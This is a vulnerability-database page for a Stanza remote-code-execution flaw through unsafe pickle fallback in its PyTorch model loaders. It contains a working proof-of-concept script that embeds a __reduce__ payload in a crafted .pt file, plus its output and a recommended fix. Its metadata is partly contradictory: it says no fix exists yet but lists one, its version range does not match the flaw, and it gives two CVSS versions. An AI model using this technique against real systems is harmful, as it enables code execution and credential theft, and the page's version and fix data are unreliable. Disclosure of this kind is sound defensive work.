CVE-2026-54499

HIGHPre-NVD 7.57.5
EchelonGraph scoreLOW confidence

This high-severity CVE scores 7.5 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
7.5
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 7.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Stanza: Remote Code Execution via Unsafe Pickle Deserialization in Model Loaders

Summary

Stanza 1.12.0 attempts to safely load PyTorch checkpoint files using torch.load(..., weights_only=True), but automatically falls back to the fully unsafe torch.load(..., weights_only=False) when the safe load raises pickle.UnpicklingError. Because the UnpicklingError condition is fully attacker-controllable, any .pt file that contains a single unsupported pickle global will trigger it.

An attacker who can place a malicious pretrain or model file on disk (via supply-chain compromise, a poisoned model repository, or a shared model cache) can achieve arbitrary code execution on any machine that loads a Stanza NLP pipeline.

Code execution occurs inside the Stanza pretrain-loading API, not merely by calling torch.load directly.

Details

The vulnerable code is in pretrain.py#L59-L67 (Stanza 1.12.0):

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=False)

When weights_only=True is passed, PyTorch's deserializer raises pickle.UnpicklingError for any object whose class or callable is not on the safe-globals allowlist. This is the intended safety mechanism. However, Stanza catches that exception and immediately reloads the same attacker-controlled file with weights_only=False, which invokes Python's full pickle deserializer and executes any __reduce__ method in the file without restriction.

The fallback is triggered reliably and intentionally: an attacker embeds one unsupported pickle global (e.g., builtins.open) anywhere in an otherwise structurally valid Stanza pretrain state dict. The safe load rejects it; the unsafe reload runs it.

The same try/except pattern exists in at least five additional loaders in Stanza 1.12.0:

| File | Lines | |------|-------| | stanza/models/common/pretrain.py | 64–66 | | stanza/models/coref/model.py | 251–253, 329–331 | | stanza/models/classifiers/trainer.py | 80–82 | | stanza/models/constituency/base_trainer.py | 94–96 |

Additionally, stanza/models/lemma_classifier/base_model.py:127 calls torch.load(filename, lambda storage, loc: storage) with no weights_only argument at all, which defaults to False on any PyTorch < 2.6.

The call chain from the public API to the vulnerable fallback is:

stanza.models.common.foundation_cache.load_pretrain(path)
  → FoundationCache.load_pretrain(path)
    → stanza.models.common.pretrain.Pretrain(filename)
      → Pretrain.emb  (property access triggers load)
        → Pretrain.load()
          → torch.load(..., weights_only=True)   # raises UnpicklingError
          → torch.load(..., weights_only=False)  # executes arbitrary pickle


PoC

Environment: Python 3.11, stanza==1.12.0, torch==2.12.0

Step 1: Install dependencies:

pip install stanza==1.12.0 torch==2.12.0

Step 2: Save the following as exploit.py:

import os
from pathlib import Path

import torch import stanza from stanza.models.common.foundation_cache import FoundationCache, load_pretrain from stanza.models.common.vocab import VOCAB_PREFIX

SENTINEL = "/tmp/stanza_rce_proof" MODEL = "/tmp/stanza_malicious.pt"

class HarmlessPayload: """Demonstrates execution; writes a sentinel file.""" def __init__(self, path): self.path = path def __reduce__(self): return (open, (self.path, "w"))

Build a structurally valid Stanza pretrain state dict with the payload embedded.

words = VOCAB_PREFIX + ["hello"] state = { "vocab": { "lang": "", "idx": 0, "cutoff": 0, "lower": False, "_id2unit": words, "_unit2id": {w: i for i, w in enumerate(words)}, }, "emb": torch.zeros((len(words), 2), dtype=torch.float32), "payload": HarmlessPayload(SENTINEL), # ← the malicious object } torch.save(state, MODEL)

Confirm safe-only load raises UnpicklingError and does NOT create sentinel.

try: torch.load(MODEL, lambda s, l: s, weights_only=True) print("UNEXPECTED: safe load succeeded (no fallback needed)") except Exception as e: print(f"Control: safe load raised {type(e).__name__} : sentinel exists: {Path(SENTINEL).exists()}")

Load through the real Stanza API. The fallback fires and the sentinel is created.

cache = FoundationCache() pretrain = load_pretrain(MODEL, foundation_cache=cache)

print(f"stanza={stanza.__version__} torch={torch.__version__}") print(f"emb_shape={tuple(pretrain.emb.shape)}") print(f"sentinel_exists={Path(SENTINEL).exists()}") print("VERDICT: ACTUAL_VULN_REAL_STANZA_PATH" if Path(SENTINEL).exists() else "VERDICT: UNPROVEN")

Step 3 : Run:

python exploit.py

Expected output (confirmed):

Control: safe load raised UnpicklingError : sentinel exists: False
stanza=1.12.0  torch=2.12.0
emb_shape=(5, 2)
sentinel_exists=True
VERDICT: ACTUAL_VULN_REAL_STANZA_PATH

The sentinel is created exclusively by the Stanza pretrain-loading API invoking the unsafe fallback : not by a direct torch.load call in the PoC.


Impact

Vulnerability class: CWE-502 : Deserialization of Untrusted Data

Who is impacted: Any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model pretrain file from a source that is not under the victim's exclusive cryptographic control. Concretely:

  • Developers who run stanza.Pipeline(lang) after downloading models from HuggingFace or GitHub
  • CI pipelines that automatically refresh Stanza models during builds
  • Research environments that share pretrain files over shared network storage or model repositories

Attack prerequisites: The attacker must be able to place a malicious .pt pretrain file at a path that Stanza will load. Realistic delivery vectors include:

  • Compromise of a HuggingFace model repository hosting Stanza pretrain weights
  • Poisoning of a shared model cache directory (NFS, S3, artifact store)
  • A malicious pretrain file distributed via a third-party fine-tuning hub or research repo

What an attacker achieves: Arbitrary code execution with the full privileges of the process running stanza.Pipeline(), typically a developer workstation, a Jupyter notebook server, or a GPU training node. This allows credential theft (HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure.

Recommended fix:

Remove the unsafe fallback entirely. If weights_only=True raises UnpicklingError, fail closed:

try:
    data = torch.load(self.filename, lambda storage, loc: storage, weights_only=True)
except UnpicklingError as e:
    raise RuntimeError(
        f"Refusing to load legacy pretrain file {self.filename!r} with unsafe "
        "deserialization. Regenerate the file using a trusted Stanza migration tool."
    ) from e

If legacy NumPy-containing pretrain files must be supported, use PyTorch's add_safe_globals() API to allowlist the specific NumPy dtypes required, rather than disabling all safety checks. Apply the same fix to all six affected loaders listed above.

CVSS v3
7.5
EG Score
7.5(low)
EPSS
KEV
Not listed

Published

June 19, 2026

Last Modified

June 19, 2026

Vendor Advisories for CVE-2026-54499(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Affected Packages

(1 across 1 ecosystem)
PyPI(1)
PackageVulnerable rangeFixed inDependents
stanza0.3 ... 1.9.2 (30 versions)1.12.2

Data Freshness Timeline

(refreshed 14× in last 7d / 36× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-06 18:57 UTCEG score recompute
  2. 2026-07-06 06:44 UTCEG score recompute
  3. 2026-07-05 19:10 UTCEG score recompute
  4. 2026-07-05 07:35 UTCEG score recompute
  5. 2026-07-04 19:59 UTCEG score recompute
  6. 2026-07-04 08:24 UTCEG score recompute
  7. 2026-07-03 20:47 UTCEG score recompute
  8. 2026-07-03 09:13 UTCEG score recompute
  9. 2026-07-02 21:39 UTCEG score recompute
  10. 2026-07-02 10:04 UTCEG score recompute
  11. 2026-07-01 22:27 UTCEG score recompute
  12. 2026-07-01 10:53 UTCEG score recompute
  13. 2026-06-30 23:15 UTCEG score recompute
  14. 2026-06-30 11:41 UTCEG score recompute
  15. 2026-06-29 23:55 UTCEG score recompute
  16. 2026-06-29 12:20 UTCEG score recompute
  17. 2026-06-29 00:45 UTCEG score recompute
  18. 2026-06-28 13:10 UTCEG score recompute
  19. 2026-06-28 01:36 UTCEG score recompute
  20. 2026-06-27 13:59 UTCEG score recompute
  21. 2026-06-27 02:22 UTCEG score recompute
  22. 2026-06-26 14:47 UTCEG score recompute
  23. 2026-06-26 03:11 UTCEG score recompute
  24. 2026-06-25 15:37 UTCEG score recompute
  25. 2026-06-25 04:02 UTCEG score recompute
Show 11 more
  1. 2026-06-24 16:27 UTCEG score recompute
  2. 2026-06-24 04:51 UTCEG score recompute
  3. 2026-06-23 17:16 UTCEG score recompute
  4. 2026-06-23 05:41 UTCEG score recompute
  5. 2026-06-22 18:04 UTCEG score recompute
  6. 2026-06-22 06:29 UTCEG score recompute
  7. 2026-06-21 18:55 UTCEG score recompute
  8. 2026-06-21 07:17 UTCEG score recompute
  9. 2026-06-20 19:40 UTCEG score recompute
  10. 2026-06-20 08:00 UTCEG score recompute
  11. 2026-06-19 20:22 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-54499?
CVE-2026-54499 is a high vulnerability published on June 19, 2026. Stanza: Remote Code Execution via Unsafe Pickle Deserialization in Model Loaders Summary Stanza 1.12.0 attempts to safely load PyTorch checkpoint files using torch.load(..., weightsonly=True), but automatically falls back to the fully unsafe torch.load(..., weightsonly=False) when the safe load…
When was CVE-2026-54499 disclosed?
CVE-2026-54499 was first published in the National Vulnerability Database on June 19, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-54499?
CVE-2026-54499 has a CVSS v4.0 base score of 7.5 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-54499?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-54499, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

See which npm, PyPI, Go, and Maven packages are affected by CVE-2026-54499

Explore →

Is Your Infrastructure Affected by CVE-2026-54499?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.